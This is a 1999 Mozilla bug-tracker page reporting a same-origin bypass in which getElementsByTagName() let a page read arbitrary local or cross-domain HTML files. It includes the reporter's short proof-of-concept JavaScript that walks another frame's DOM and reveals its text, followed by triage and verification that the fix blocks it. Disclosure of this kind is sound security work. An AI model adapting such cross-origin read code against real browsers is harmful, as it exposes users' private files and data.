Closed Bug 15067 Opened 26 years ago Closed 26 years ago

[DOGFOOD] getElementsByTagName() allows reading of arbitrary HTML files

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
Windows 95
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

(
URL
)

Details

(Whiteboard: [PDT+])

There is a security vulnerability in Mozilla 5.0 (1999092708 and earlier) which allows reading arbitrary HTML files - local and in any domain. The problem is the method "getElementsByTagName" which allows walking the DOM tree of any HTML file. The code is: ------ function f(o) { var s=''; var i; s = o.nodeValue; if ( o.childNodes ) for ( i = 0; i < o.childNodes.length; i++ ) s += f(o.childNodes[i]); return s; } setTimeout("a=top.frames[0].document.getElementsByTagName('HTML');s=f(a[0]);aler t(s)",14000); -------- (you need two frames, frames[0] being the file to be read)
Status: NEW → ASSIGNED
Also need to stop access to ranges.
Target Milestone: M12
Summary: getElementsByTagName() allows reading of arbitrary HTML files → [Dogfood] getElementsByTagName() allows reading of arbitrary HTML files
Marking dogfood for analysis by PDT at jar's request.
Summary: [Dogfood] getElementsByTagName() allows reading of arbitrary HTML files → [DOGFOOD] getElementsByTagName() allows reading of arbitrary HTML files
Putting on PDT+ radar.
Whiteboard: [PDT+]
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
Status: RESOLVED → VERIFIED
Windows NT (1999112908) Com: Javascript Error: uncaught exception: [Exception... "Security error" code: "1000" nsresult: "0x805303e8 (NS_ERROR_DOM_SECURITY_ERR)" location: "http://www.nat.bg/~joro/mozilla/nodes.html Line: 13"]
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.